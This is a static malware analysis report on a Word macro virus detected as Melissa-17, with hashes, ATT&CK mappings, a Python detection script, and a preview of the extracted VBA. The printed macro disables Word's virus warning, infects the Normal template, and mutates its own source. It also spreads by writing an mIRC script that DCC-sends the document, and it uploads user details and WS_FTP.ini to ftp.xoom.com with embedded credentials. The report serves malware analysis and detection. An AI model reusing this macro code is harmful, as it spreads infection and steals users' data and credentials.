Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5d0ab247810fc75…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 34.5 KB
Created: 1999-04-01 19:52:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: aa475d4781d844537c31af65a29ccc61
SHA-1: d8d7b3f48302e2164df6fa29eee9689c29d44a55
SHA-256: c5d0ab247810fc75b4997ae4557da821625dadc906c887acdc77c52c0eb9e9f0
Risk score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File
  Additional mappings from manual review of the extracted macro (not in the analyzer's tag set): T1552.001 Unsecured Credentials: Credentials In Files (the search for WS_FTP.ini, which holds saved FTP session settings) and T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (the FTP upload).

The sample carries a VBA macro in the ThisDocument module whose Document_Open handler runs automatically when the document is opened. The handler first disables Word's macro-virus warning (Options.VirusProtection = False) and the Ctrl+Break cancel key, then checks whether the active document and the Normal template already carry the macro (by testing line 2 of each code module for "On Error Resume Next") and selects the uninfected one as the infection target, so the sample is a self-replicating macro virus, and the tail of the listing shows it mutating its own source before copying it. The "WORM" section writes an mIRC script.ini, choosing the document's own directory, the parent of a directory named DOWNLOAD (mIRC's default DCC download folder), or C:\MIRC\Script.ini; the script contains an on JOIN event that DCC-sends the infected document (ThisDocument.FullName) to every user who joins a channel. The "PAYLOAD" section, gated on a task window titled "Sockets Window" and a once-per-weekday marker stored through System.PrivateProfileString under HKEY_CURRENT_USER\Software, searches C:\ for WS_FTP.ini, writes the Word user name and address (and the document path if it is password protected) to %WINDIR%\<user initials>.dat, generates an FTP command script %WINDIR%\Command.$$$ that logs in to ftp.xoom.com with embedded credentials and uploads those files, and runs it hidden via Shell with command.com /c FTP.exe -n -s:<script>. Nothing is downloaded: the Shell() call is the exfiltration step, not a second-stage loader. The ClamAV detection Doc.Trojan.Melissa-17 independently flags the file as a known malicious Word macro.

Heuristics (6)

  • ClamAV: Doc.Trojan.Melissa-17 critical CLAMAV_DETECTION
    ClamAV signature match: Doc.Trojan.Melissa-17.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    The document contains VBA macro code (ThisDocument module; decoded source in the extracted macros.bas below).
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell is used to run command.com /c FTP.exe -n -s:<WINDIR>\Command.$$$ with vbHide, executing the FTP script the macro has just written.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Auto-execution: the Document_Open event handler runs as soon as the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ("WINDIR") is read to build the paths of the dropped .dat file and of Command.$$$.
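The heuristic IDs above are the analyzer's. As an added illustration (my own code, not the analyzer's and not oletools), the Python below reproduces the two ways such findings are produced: source-level rules run over a constructed excerpt of the macro shown in the preview below, and the token co-occurrence rule that OLE_VBA_PCODE_AUTOEXEC_EXEC describes for p-code-only streams, where only identifier and string tokens survive. The token lists, the extra finding IDs (VBA_DISABLES_MACRO_WARNING, VBA_WRITES_FILE, VBA_FTP_SCRIPT_EXEC) and the severity weights are assumptions of mine; the additive score is illustrative and not the report's 228 scale.

```python
import re

# Constructed sample input: a short excerpt copied from the macros.bas preview
# on this page (not the full extracted file).
SAMPLE_VBA = r'''
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = wdDisabled
Options.VirusProtection = False
WinPath = Environ("WINDIR")
Open SDir For Output As #1
Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#"
Close #1
Shell WinPath & "\command.com /c FTP.exe -n -s:" & WinPath & "\Command.$$$", vbHide
End Sub
'''

# Token lists are mine (illustrative); real scanners carry far longer ones.
AUTOEXEC_TOKENS = ("Document_Open", "Document_Close", "AutoOpen", "AutoExec",
                   "AutoClose", "Auto_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "ShellExecute", "WScript.Shell", "CreateObject",
               "GetObject", "URLDownloadToFile", "XMLHTTP")


def _token_re(tok):
    # Whole-token match: not glued to a preceding identifier char or member dot,
    # so "Shell" does not fire on "WScript.Shell" twice.
    return re.compile(r"(?<![\w.])" + re.escape(tok) + r"(?!\w)", re.I)


def triage_source(src: str) -> dict:
    """Return {finding_id: severity} for decoded VBA source.

    OLE_VBA_DOCOPEN / OLE_VBA_SHELL / OLE_VBA_ENVIRON follow the report above;
    the remaining IDs are my own names for checks grounded in this macro.
    """
    findings = {}
    if any(_token_re(t).search(src) for t in AUTOEXEC_TOKENS):
        findings["OLE_VBA_DOCOPEN"] = "high"
    if _token_re("Shell").search(src):
        findings["OLE_VBA_SHELL"] = "critical"
    if re.search(r"\bEnviron\$?\s*\(", src, re.I):
        findings["OLE_VBA_ENVIRON"] = "low"
    if re.search(r"Options\.VirusProtection\s*=\s*False", src, re.I):
        findings["VBA_DISABLES_MACRO_WARNING"] = "high"   # illustrative ID
    if re.search(r"\bOpen\b.+\bFor\s+Output\b", src, re.I):
        findings["VBA_WRITES_FILE"] = "medium"            # illustrative ID
    if re.search(r"\bftp(\.exe)?\b.*-s:", src, re.I):
        findings["VBA_FTP_SCRIPT_EXEC"] = "high"          # illustrative ID
    return findings


def triage_pcode_tokens(tokens) -> bool:
    """Emulate OLE_VBA_PCODE_AUTOEXEC_EXEC: with no decodable source, only the
    identifier/string tokens recovered from the compiled stream are available.
    The rule fires when an auto-exec token co-occurs with an execution token."""
    seen = {t.lower() for t in tokens}
    has_autoexec = any(t.lower() in seen for t in AUTOEXEC_TOKENS)
    has_exec = any(t.lower() in seen for t in EXEC_TOKENS)
    return has_autoexec and has_exec


SEVERITY_WEIGHT = {"critical": 100, "high": 40, "medium": 15, "low": 5}


def risk_score(findings: dict) -> int:
    """Illustrative additive score (assumption; not the report's own scale)."""
    return sum(SEVERITY_WEIGHT[sev] for sev in findings.values())


if __name__ == "__main__":
    found = triage_source(SAMPLE_VBA)
    for fid, sev in found.items():
        print(f"{sev:9s} {fid}")
    print("score:", risk_score(found))
    # Constructed token list, as if pulled from a p-code-only VBA stream.
    print("p-code rule:", triage_pcode_tokens(
        ["ThisDocument", "Document_Open", "Environ", "Shell", "FTP.exe"]))
```

The p-code rule is deliberately coarse: a benign template with an AutoOpen handler that calls Shell would fire too, which is why the report rates it high rather than critical and why the source-level findings carry the verdict when source is available.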

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18426 bytes
SHA-256: f6b0c3b018ecb03520d263d982e13ed115e874d9932be3420e45eb47104c1257
Preview: first 1,000 lines of the extracted script (the listing is truncated on this page)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = wdDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Randomize Timer
LordArz = "Technological Illusions"
NormInstalled = False
ActInstalled = False
Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule

NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)

If UCase(NI) = "ON ERROR RESUME NEXT" Then NormInstalled = True
If UCase(AI) = "ON ERROR RESUME NEXT" Then ActInstalled = True

If NormInstalled = False Then
    Set Infection = NormCarrier
    Set Carrier = ActCarrier
Else
    Set Infection = ActCarrier
    Set Carrier = NormCarrier
End If



DoEvents

Rem -------------------BEGIN WORM------------------------------------->
Close
Tr1 = Dir(CurDir & "\script.ini", vbNormal)
Tr2 = UCase(Right(CurDir, 8))
Tr3 = Dir("C" & Chr(58) & "\MIRC", vbDirectory)

If Tr1 <> "" Then SDir = CurDir & "\script.ini"
If Tr2 = "DOWNLOAD" Then SDir = CurDir & "\..\Script.ini"
If Tr3 <> "" Then SDir = "C" & Chr(58) & "\MIRC\Script.ini"

If SDir <> "" Then
    Open SDir For Output As #1
    Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#" & Chr(59) & "if ( $me != $nick ) { /dcc send $nick " & ThisDocument.FullName & " }"
    Close #1
End If
Rem ----------------------------END WORM------------------------------>
DoEvents
Rem ----------------------------BEGIN PAYLOAD------------------------->

WinPath = Environ("WINDIR")

If Application.Tasks.Exists("Sockets Window") = True And System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "" Or System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date) Then
    With Application.FileSearch
            .FileName = "WS_FTP.ini"
            .LookIn = "C" & Chr(58) & "\"
            .SearchSubFolders = True
            .MatchTextExactly = True
            .FileType = msoFileTypeAllFiles
            .Execute
            WsPath = .FoundFiles(1)
    End With
       
    DoEvents
    
    If ActiveDocument.HasPassword = True Then BCK = True
    
    DoEvents
    Open WinPath & "\" & Application.UserInitials & ".dat" For Output As #10
    Print #10, Application.UserName
    Print #10, Application.UserAddress
    If BCK = True Then Print #10, ActiveDocument.FullName
    If WsPath <> "" Then Print #10, "WS_FTP"
    Close #10
    Open WinPath & "\Command.$$$" For Output As #8
    Print #8, "o ftp.xoom.com"
    Print #8, "User SingOfScream"
    Print #8, "DIG001"
    Print #8, "binary"
    Print #8, "put " & WinPath & "\" & Application.UserInitials & ".dat"
    If WsPath <> "" Then Print #8, "put " & WsPath
    If BCK = True Then Print #8, "put " & ActiveDocument.FullName
        Print #8, "quit"
    Close
    Shell WinPath & "\command.com /c FTP.exe -n -s:" & WinPath & "\Command.$$$", vbHide
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date)
End If
Rem ------------------------------END OF PAYLOAD---------------------->

For x = 1 To ThisDocument.Variables.Count
    ThisDocument.Variables(x).Delete
Next x
For x = 1 To Normal.ThisDocument.Variables.Count
    Normal.ThisDocument.Variables(x).Delete
Next x

With Carrier
    UECode = .Lines(1, 2) & Chr(13)
    For x = 5 To .CountOfLines - 1
        VCCode = .Lines(x, 1)
        If VCCode = "End Sub" Then Exit For
        For i = 1 To 20
            If Mid(VCCode, i, 1) = ":" Then VCCode = Right(VCCode, Len(VCCode) - i)
        Next i
        factor = ""
        For Y = 1 To Int(Rnd * 6) + 6
            factor = factor & Chr(Int(Rnd * 25) + 65)
        Next Y
        make_morph = 
... (truncated)